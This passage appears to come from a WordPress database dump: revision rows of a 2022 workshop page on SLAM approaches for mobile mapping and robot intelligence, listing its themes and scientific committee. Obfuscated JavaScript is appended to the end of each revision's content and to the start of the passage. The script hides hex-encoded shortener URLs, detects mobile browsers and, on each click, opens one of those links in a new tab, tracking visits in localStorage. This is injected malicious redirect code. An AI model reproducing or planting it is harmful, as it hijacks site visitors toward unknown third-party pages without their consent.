)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Robotics for Mapping - SLAM approaches for mobile mapping and robot intelligence','','inherit','closed','closed','','2570-revision-v1','','','2022-10-07 20:53:55','2022-10-07 20:53:55','',2570,'https://gsw2023.com/?p=2594',0,'revision','',0),
(2595,1,'2022-10-07 20:55:00','2022-10-07 20:55:00','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2585\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: black;\">The availability of accurate geospatial information and reliable ubiquitous localization systems are key factors in a number of applications and contexts, ranging from location-based services and smart cities, to the use of terrestrial, underground, aerial and underwater autonomous robots, autonomous driving, and positioning in GNSS-denied environments, just to mention a few. The recent development of effective artificial intelligence tools also plays a core role in these applications, in order to enable an effective machine interpretation and understanding of geospatial data.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">The previously mentioned applications are usually related to the use of mobile platforms working in real time: these requirements imply the use of effective mobile mapping systems. Furthermore, the need for ubiquitous accurate localization goes beyond the possibilities of stand-alone GNSS positioning. In this context, simultaneous mapping and localization (SLAM) techniques have proved to be effective solutions in order to properly compensate for the unreliability of GNSS in certain working conditions, while preserving the possibility of fast accurate mapping.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">Motivated by the above considerations, this workshop will seek contributions covering advanced topics related to the state of the art and future trends of SLAM approaches for mobile mapping and robot intelligence, focusing both on the mapping and localization problems, and on the artificial intelligence tools needed in order to enable mobile perception and real time machine understanding of geospatial data.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]\r\n<h1 style=\"text-align: center;\">CHAIRS</h1>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"36\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Simultaneous localization and mapping (SLAM) techniques</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Semantic and metric SLAM</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Calibration of mobile (multi) sensor systems</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Evaluation of localization and mapping sensors for indoor and outdoor robotics</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Learning and optimization for robotics multi-sensor integration</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>New robotic mapping applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mapping representations for robotics and autonomous vehicle navigation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Robotic mapping benchmarks</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>On-board sensors of autonomous systems for mapping and map updating purposes</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Perception in non-controlled or complex or non-cooperative environments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Spatial representations, data structures and database technologies for large scale mapping and map updating</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Synergies between indoor mobile mapping and building information modelling (BIM)</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Integration of SLAM with inertial sensors</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Low cost sensors for mapping and localization</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Yuan Zhuang, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Vincenzo di Pietra Politecnico di Torino, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Stephan Nebiker, FHNW, Switzerland</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Heikki Hyyti, NLS, Finnland</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Phillipp Fanta-Jende, AIT, Austria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Norbert Haala, University of Stuttgart</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Robotics for Mapping - SLAM approaches for mobile mapping and robot intelligence','','inherit','closed','closed','','2570-revision-v1','','','2022-10-07 20:55:00','2022-10-07 20:55:00','',2570,'https://gsw2023.com/?p=2595',0,'revision','',0),
(2596,1,'2022-10-07 21:17:35','2022-10-07 21:17:35','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2585\" alignment=\"center\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: black;\">The availability of accurate geospatial information and reliable ubiquitous localization systems are key factors in a number of applications and contexts, ranging from location-based services and smart cities, to the use of terrestrial, underground, aerial and underwater autonomous robots, autonomous driving, and positioning in GNSS-denied environments, just to mention a few. The recent development of effective artificial intelligence tools also plays a core role in these applications, in order to enable an effective machine interpretation and understanding of geospatial data.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">The previously mentioned applications are usually related to the use of mobile platforms working in real time: these requirements imply the use of effective mobile mapping systems. Furthermore, the need for ubiquitous accurate localization goes beyond the possibilities of stand-alone GNSS positioning. In this context, simultaneous mapping and localization (SLAM) techniques have proved to be effective solutions in order to properly compensate for the unreliability of GNSS in certain working conditions, while preserving the possibility of fast accurate mapping.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">Motivated by the above considerations, this workshop will seek contributions covering advanced topics related to the state of the art and future trends of SLAM approaches for mobile mapping and robot intelligence, focusing both on the mapping and localization problems, and on the artificial intelligence tools needed in order to enable mobile perception and real time machine understanding of geospatial data.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]\r\n<h1 style=\"text-align: center;\">CHAIRS</h1>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"36\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Simultaneous localization and mapping (SLAM) techniques</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Semantic and metric SLAM</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Calibration of mobile (multi) sensor systems</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Evaluation of localization and mapping sensors for indoor and outdoor robotics</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Learning and optimization for robotics multi-sensor integration</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>New robotic mapping applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mapping representations for robotics and autonomous vehicle navigation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Robotic mapping benchmarks</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>On-board sensors of autonomous systems for mapping and map updating purposes</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Perception in non-controlled or complex or non-cooperative environments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Spatial representations, data structures and database technologies for large scale mapping and map updating</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Synergies between indoor mobile mapping and building information modelling (BIM)</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Integration of SLAM with inertial sensors</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Low cost sensors for mapping and localization</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Yuan Zhuang, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Vincenzo di Pietra Politecnico di Torino, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Stephan Nebiker, FHNW, Switzerland</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Heikki Hyyti, NLS, Finnland</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Phillipp Fanta-Jende, AIT, Austria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Norbert Haala, University of Stuttgart</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 